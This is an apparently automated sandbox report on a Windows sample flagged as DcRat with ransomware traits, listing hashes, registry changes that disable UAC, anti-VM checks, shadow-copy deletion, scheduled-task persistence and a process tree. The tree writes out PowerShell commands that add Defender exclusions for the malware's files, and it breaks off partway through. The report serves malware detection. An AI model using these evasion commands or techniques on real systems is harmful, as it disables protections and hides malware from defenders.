Analysis
-
max time kernel
136s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
13-03-2023 09:29
Behavioral task
behavioral1
Sample
ec50388a69792d133c1298e1dceb40a6.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ec50388a69792d133c1298e1dceb40a6.exe
Resource
win10v2004-20230220-en
General
-
Target
ec50388a69792d133c1298e1dceb40a6.exe
-
Size
2.3MB
-
MD5
ec50388a69792d133c1298e1dceb40a6
-
SHA1
80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
-
SHA256
bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
-
SHA512
fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
SSDEEP
49152:PuxU6VfbIhv2/g8nn7HoqW2m86bzBvwv+P9gB8xy2LmQKV:Wi6VzIA/gg7IR8iVgB8xybQKV
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 24 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 220 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1752 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5032 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3240 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4116 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4084 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2748 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4892 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3888 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4612 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4760 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 540 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4224 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1300 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4932 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4948 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5108 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4984 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1584 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 4996 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3696 4996 schtasks.exe -
Processes:
ec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exeec50388a69792d133c1298e1dceb40a6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontdrvhost.exe -
Processes:
resource yara_rule behavioral2/memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmp dcrat behavioral2/memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmp dcrat behavioral2/memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmp dcrat behavioral2/memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmp dcrat behavioral2/memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmp dcrat -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec50388a69792d133c1298e1dceb40a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec50388a69792d133c1298e1dceb40a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fontdrvhost.exe -
Downloads MZ/PE file
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
AppLaunch.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\UnprotectStop.tiff AppLaunch.exe File renamed C:\Users\Admin\Pictures\LockGrant.crw => C:\Users\Admin\Pictures\LockGrant.crw.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\LockGrant.crw.alice AppLaunch.exe File renamed C:\Users\Admin\Pictures\UnprotectStop.tiff => C:\Users\Admin\Pictures\UnprotectStop.tiff.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\UnprotectStop.tiff.alice AppLaunch.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exeec50388a69792d133c1298e1dceb40a6.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fontdrvhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fontdrvhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec50388a69792d133c1298e1dceb40a6.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
m.exeec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation m.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation fontdrvhost.exe -
Executes dropped EXE 5 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exem.exeh.exemm.exepid process 4452 ec50388a69792d133c1298e1dceb40a6.exe 3116 fontdrvhost.exe 1304 m.exe 3932 h.exe 5260 mm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmp themida C:\Recovery\WindowsRE\backgroundTaskHost.exe themida C:\Recovery\WindowsRE\RCX9F97.tmp themida C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe themida behavioral2/memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmp themida behavioral2/memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmp themida C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe themida C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe themida behavioral2/memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmp themida behavioral2/memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Processes:
ec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exeec50388a69792d133c1298e1dceb40a6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ec50388a69792d133c1298e1dceb40a6.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
AppLaunch.exedescription ioc process File opened (read-only) \??\W: AppLaunch.exe File opened (read-only) \??\U: AppLaunch.exe File opened (read-only) \??\O: AppLaunch.exe File opened (read-only) \??\G: AppLaunch.exe File opened (read-only) \??\Z: AppLaunch.exe File opened (read-only) \??\Q: AppLaunch.exe File opened (read-only) \??\L: AppLaunch.exe File opened (read-only) \??\V: AppLaunch.exe File opened (read-only) \??\A: AppLaunch.exe File opened (read-only) \??\Y: AppLaunch.exe File opened (read-only) \??\I: AppLaunch.exe File opened (read-only) \??\H: AppLaunch.exe File opened (read-only) \??\J: AppLaunch.exe File opened (read-only) \??\K: AppLaunch.exe File opened (read-only) \??\B: AppLaunch.exe File opened (read-only) \??\N: AppLaunch.exe File opened (read-only) \??\T: AppLaunch.exe File opened (read-only) \??\M: AppLaunch.exe File opened (read-only) \??\R: AppLaunch.exe File opened (read-only) \??\P: AppLaunch.exe File opened (read-only) \??\S: AppLaunch.exe File opened (read-only) \??\F: AppLaunch.exe File opened (read-only) \??\X: AppLaunch.exe File opened (read-only) \??\E: AppLaunch.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 53 ipinfo.io 54 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exepid process 1636 ec50388a69792d133c1298e1dceb40a6.exe 4452 ec50388a69792d133c1298e1dceb40a6.exe 3116 fontdrvhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
h.exem.exedescription pid process target process PID 3932 set thread context of 4056 3932 h.exe AppLaunch.exe PID 1304 set thread context of 3752 1304 m.exe vbc.exe -
Drops file in Program Files directory 12 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exedescription ioc process File opened for modification C:\Program Files\Windows Security\RCXD3A2.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Security\RCXD3F2.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Internet Explorer\images\RCXDBE6.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files (x86)\Windows Defender\fr-FR\5b884080fd4f94 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Security\System.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files (x86)\Internet Explorer\images\56085415360792 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\RCXD15F.tmp ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files\Windows Security\27d1bcfc3c54e0 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Internet Explorer\images\wininit.exe ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\RCXD101.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Internet Explorer\images\RCXDC06.tmp ec50388a69792d133c1298e1dceb40a6.exe -
Drops file in Windows directory 4 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exedescription ioc process File opened for modification C:\Windows\CbsTemp\dllhost.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Windows\CbsTemp\5940a34987c991 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\CbsTemp\RCXD888.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\CbsTemp\RCXD9B2.tmp ec50388a69792d133c1298e1dceb40a6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 25 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4224 schtasks.exe 5108 schtasks.exe 1584 schtasks.exe 4040 schtasks.exe 3240 schtasks.exe 4672 schtasks.exe 4892 schtasks.exe 4760 schtasks.exe 1300 schtasks.exe 2440 schtasks.exe 4932 schtasks.exe 4948 schtasks.exe 4984 schtasks.exe 1680 schtasks.exe 2748 schtasks.exe 4612 schtasks.exe 540 schtasks.exe 4116 schtasks.exe 4084 schtasks.exe 3888 schtasks.exe 2084 schtasks.exe 3696 schtasks.exe 220 schtasks.exe 1752 schtasks.exe 5032 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 5348 vssadmin.exe 5800 vssadmin.exe -
Modifies registry class 2 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ ec50388a69792d133c1298e1dceb40a6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ ec50388a69792d133c1298e1dceb40a6.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exeec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exefontdrvhost.exepowershell.exeAppLaunch.exepowershell.exem.exepid process 1636 ec50388a69792d133c1298e1dceb40a6.exe 1636 ec50388a69792d133c1298e1dceb40a6.exe 1636 ec50388a69792d133c1298e1dceb40a6.exe 2380 powershell.exe 3104 powershell.exe 1912 powershell.exe 692 powershell.exe 3104 powershell.exe 692 powershell.exe 1912 powershell.exe 2380 powershell.exe 4452 ec50388a69792d133c1298e1dceb40a6.exe 4452 ec50388a69792d133c1298e1dceb40a6.exe 4452 ec50388a69792d133c1298e1dceb40a6.exe 4080 powershell.exe 4080 powershell.exe 3336 powershell.exe 3336 powershell.exe 2180 powershell.exe 2180 powershell.exe 4256 powershell.exe 4256 powershell.exe 4868 powershell.exe 4868 powershell.exe 3336 powershell.exe 4080 powershell.exe 2180 powershell.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 4256 powershell.exe 4868 powershell.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 3116 fontdrvhost.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 4056 AppLaunch.exe 4056 AppLaunch.exe 5380 powershell.exe 5380 powershell.exe 5380 powershell.exe 1304 m.exe 1304 m.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
fontdrvhost.exepid process 3116 fontdrvhost.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exeec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exefontdrvhost.exevssvc.exem.exepowershell.exevssvc.exepowershell.exedescription pid process Token: SeDebugPrivilege 1636 ec50388a69792d133c1298e1dceb40a6.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 4452 ec50388a69792d133c1298e1dceb40a6.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 3116 fontdrvhost.exe Token: SeBackupPrivilege 4632 vssvc.exe Token: SeRestorePrivilege 4632 vssvc.exe Token: SeAuditPrivilege 4632 vssvc.exe Token: SeDebugPrivilege 1304 m.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeBackupPrivilege 5508 vssvc.exe Token: SeRestorePrivilege 5508 vssvc.exe Token: SeAuditPrivilege 5508 vssvc.exe Token: SeDebugPrivilege 5380 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
fontdrvhost.exepid process 3116 fontdrvhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exem.exeh.exeAppLaunch.exemm.execmd.execmd.exedescription pid process target process PID 1636 wrote to memory of 692 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 692 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 692 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 2380 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 2380 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 2380 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 1912 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 1912 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 1912 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 3104 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 3104 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 3104 1636 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1636 wrote to memory of 4452 1636 ec50388a69792d133c1298e1dceb40a6.exe ec50388a69792d133c1298e1dceb40a6.exe PID 1636 wrote to memory of 4452 1636 ec50388a69792d133c1298e1dceb40a6.exe ec50388a69792d133c1298e1dceb40a6.exe PID 1636 wrote to memory of 4452 1636 ec50388a69792d133c1298e1dceb40a6.exe ec50388a69792d133c1298e1dceb40a6.exe PID 4452 wrote to memory of 4256 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4256 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4256 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4956 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4956 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4956 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 3336 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 3336 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 3336 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 2180 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 2180 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 2180 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4080 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4080 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4080 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4868 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4868 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 4868 4452 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 4452 wrote to memory of 3116 4452 ec50388a69792d133c1298e1dceb40a6.exe fontdrvhost.exe PID 4452 wrote to memory of 3116 4452 ec50388a69792d133c1298e1dceb40a6.exe fontdrvhost.exe PID 4452 wrote to memory of 3116 4452 ec50388a69792d133c1298e1dceb40a6.exe fontdrvhost.exe PID 3116 wrote to memory of 1304 3116 fontdrvhost.exe m.exe PID 3116 wrote to memory of 1304 3116 fontdrvhost.exe m.exe PID 1304 wrote to memory of 4684 1304 m.exe powershell.exe PID 1304 wrote to memory of 4684 1304 m.exe powershell.exe PID 3116 wrote to memory of 3932 3116 fontdrvhost.exe h.exe PID 3116 wrote to memory of 3932 3116 fontdrvhost.exe h.exe PID 3116 wrote to memory of 3932 3116 fontdrvhost.exe h.exe PID 3932 wrote to memory of 4056 3932 h.exe AppLaunch.exe PID 3932 wrote to memory of 4056 3932 h.exe AppLaunch.exe PID 3932 wrote to memory of 4056 3932 h.exe AppLaunch.exe PID 3932 wrote to memory of 4056 3932 h.exe AppLaunch.exe PID 3932 wrote to memory of 4056 3932 h.exe AppLaunch.exe PID 4056 wrote to memory of 4956 4056 AppLaunch.exe cmd.exe PID 4056 wrote to memory of 4956 4056 AppLaunch.exe cmd.exe PID 3116 wrote to memory of 5260 3116 fontdrvhost.exe mm.exe PID 3116 wrote to memory of 5260 3116 fontdrvhost.exe mm.exe PID 5260 wrote to memory of 5380 5260 mm.exe powershell.exe PID 5260 wrote to memory of 5380 5260 mm.exe powershell.exe PID 4056 wrote to memory of 5740 4056 AppLaunch.exe cmd.exe PID 4056 wrote to memory of 5740 4056 AppLaunch.exe cmd.exe PID 5740 wrote to memory of 5800 5740 cmd.exe vssadmin.exe PID 5740 wrote to memory of 5800 5740 cmd.exe vssadmin.exe PID 1304 wrote to memory of 6136 1304 m.exe cmd.exe PID 1304 wrote to memory of 6136 1304 m.exe cmd.exe PID 6136 wrote to memory of 4040 6136 cmd.exe schtasks.exe PID 6136 wrote to memory of 4040 6136 cmd.exe schtasks.exe PID 1304 wrote to memory of 3752 1304 m.exe vbc.exe PID 1304 wrote to memory of 3752 1304 m.exe vbc.exe -
System policy modification 1 TTPs 9 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeec50388a69792d133c1298e1dceb40a6.exefontdrvhost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontdrvhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"1⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\backgroundTaskHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
